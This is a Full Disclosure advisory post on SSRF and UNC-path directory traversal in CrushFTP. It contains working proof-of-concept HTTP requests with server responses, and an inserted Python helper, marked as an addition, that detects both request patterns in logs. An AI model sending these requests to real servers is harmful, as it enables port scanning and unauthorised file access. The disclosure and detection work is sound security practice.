Message-ID: <CANoQWWd8+3oVTJgkCXt-cxMy4y-1sCesAyVC49ZU67D_tyTDdg@mail.gmail.com>
Date: Fri, 4 Apr 2025 08:01:00 +0200
From: Rafael Pedrero <rafael.pedrero@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] [CVE-2025-32102, CVE-2025-32103] SSRF and Directory Traversal in CrushFTP 10.7.1 and 11.1.0 (as well as legacy 9.x)

<!--
# Exploit Title: Server-Side Request Forgery (SSRF) in CrushFTP 10.7.1 and 11.1.0 (as well as legacy 9.x)
# Date: 2024-10-20
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.crushftp.com/
# Software Link: https://www.crushftp.com/download/
# Version: CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1
# Tested on: all
# CVE : CVE-2025-32102
# Vulnerability: CWE-918
# Category: webapps

1. Description

CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1 allows SSRF
via the host and port parameters in a command=telnetSocket request to the
/WebInterface/function/ URI.

2. Proof of Concept

The application has a form to establish telnet connections. The target is
entered through the host and port parameters, for example
"host=127.0.0.1&port=8080". Because the response contains the string
"Connected" when the connection succeeds and "Connection%20refused" when it
does not, the endpoint can be used to scan remote ports from the server.

POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Origin: http://127.0.0.1:9090
Connection: keep-alive
Referer: http://127.0.0.1:9090/WebInterface/admin/telnet.html
Cookie: CrushAuth=1729605510796_1Zx7MxaDU90dcHQHzIRihmd4peCaVq;
currentAuth=CaVq
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Host: 127.0.0.1:9090

command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8080&random=0.17159638175272862&c2f=CaVq

Open port: 8080
<commandResult><response><id>PeT</id><data>Connected (/127.0.0.1)
</data></response></commandResult>

Closed port: 8888
<commandResult><response><error>ERROR:java.net.ConnectException%3A%20Connection%20refused%3A%20getsockopt:
(/127.0.0.1)</error>Error:java.lang.NullPointerException
</response></commandResult>


3. Solution:

Update to the latest version of this product.

-->
<!--
# Exploit Title: Directory Traversal in CrushFTP 10.7.1 and 11.1.0 (as well as legacy 9.x)
# Date: 2024-10-20
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.crushftp.com/
# Software Link: https://www.crushftp.com/download/
# Version: CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1
# Tested on: all
# CVE : CVE-2025-32103
# Vulnerability: CWE-40
# Category: webapps

1. Description

CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1 allows
directory traversal via the /WebInterface/function/ URI to read files
accessible by SMB at UNC share pathnames, bypassing SecurityManager
restrictions.

2. Proof of Concept

When listing directories or files, the application's logic does not account
for the path being modified into a UNC path that points at another machine
on the network or on the internet instead of at local files. An attacker
supplies a UNC path (\\server\resource) instead of a local path (such as
C:/PATH) and gains access to remote directories or files. This is more
specific than typical path traversal and occurs when network paths are not
properly filtered or restricted.

POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 113
Origin: http://127.0.0.1:9090
Connection: keep-alive
Referer: http://127.0.0.1:9090/WebInterface/Preferences/index.html
Cookie: CrushAuth=1729605510796_1Zx7MxaDU90dcHQHzIRihmd4peCaVq;
currentAuth=CaVq
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Host: 127.0.0.1:9090

command=getAdminXMLListing&file_mode=server&format=JSON&path=\\\\vboxsrv\\demo&random=0.7936410212028374&c2f=CaVq

<?xml version="1.0" encoding="UTF-8"?>
<listingInfo type="properties">
<path>////vboxsrv/demo/</path>
<privs>(read)(view)</privs>
<listing>l = new Array();
lp = {};
lp.name="directorio1";
lp.type="DIR";
lp.root_dir="//vboxsrv/demo/";
lp.href_path="////vboxsrv/demo/directorio1";
lp.privs="(read)(view)";
lp.size="0";
lp.modified="0";
lp.created="null";
l[l.length] = lp;
lp = {};
lp.name="directorio2";
lp.type="DIR";
lp.root_dir="//vboxsrv/demo/";
lp.href_path="////vboxsrv/demo/directorio2";
...


The vulnerable parameter is path: the local path can be replaced with a
remote path, causing remote directories to be listed. The listing could
later be used to download files from those directories, just as if they
were local.
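A detection helper for both request patterns in this advisory (the telnetSocket SSRF probe and the UNC path in getAdminXMLListing), meant to run over proxy or WAF logs of POST bodies to /WebInterface/function/. This is an added example, not code from the advisory or from CrushFTP; ALLOWED_TELNET_HOSTS is a hypothetical allow-list and the sample bodies are constructed (the first two mirror the PoCs above).

```python
import re
from typing import Optional, List
from urllib.parse import parse_qs

# Hypothetical allow-list: hosts the telnet feature may legitimately reach.
ALLOWED_TELNET_HOSTS = {"ftp.example.internal"}


def parse_body(body: str) -> dict:
    """Decode a form-urlencoded body into {param: first_value} (values
    are percent-decoded; backslashes are left untouched)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def is_unc_or_remote_path(path: str) -> bool:
    """True when 'path' names a UNC share instead of a local directory.
    Two or more leading back- or forward slashes count as remote: the PoC
    sends \\\\vboxsrv\\demo and the server echoes ////vboxsrv/demo/.
    On a Linux host a doubled '/' is a plain local path, so tune this
    check to the platform the server runs on."""
    return re.match(r"^[\\/]{2,}[^\\/]+", path) is not None


def classify(body: str) -> Optional[str]:
    """Return a finding label for one request body, or None if benign."""
    p = parse_body(body)
    cmd = p.get("command")
    if cmd == "telnetSocket" and p.get("sub_command") == "connect":
        host = p.get("host", "")
        if host not in ALLOWED_TELNET_HOSTS:
            return f"ssrf-probe host={host} port={p.get('port')}"
    if cmd == "getAdminXMLListing" and is_unc_or_remote_path(p.get("path", "")):
        return f"unc-listing path={p.get('path')}"
    return None


def scan_bodies(bodies: List[str]) -> List[str]:
    """Run classify over many logged bodies and keep only the findings."""
    return [f for f in (classify(b) for b in bodies) if f]


# Constructed sample bodies; raw strings keep the PoC's backslashes intact.
SAMPLES = [
    r"command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8080&random=0.17&c2f=CaVq",
    r"command=getAdminXMLListing&file_mode=server&format=JSON&path=\\\\vboxsrv\\demo&random=0.79&c2f=CaVq",
    r"command=getAdminXMLListing&file_mode=server&format=JSON&path=C:/CrushFTP/&c2f=CaVq",
    r"command=telnetSocket&sub_command=connect&host=ftp.example.internal&port=21&c2f=CaVq",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(classify(body) or "ok", "<-", body[:60])
```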


3. Solution:

Update to the latest version of this product.

-->
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
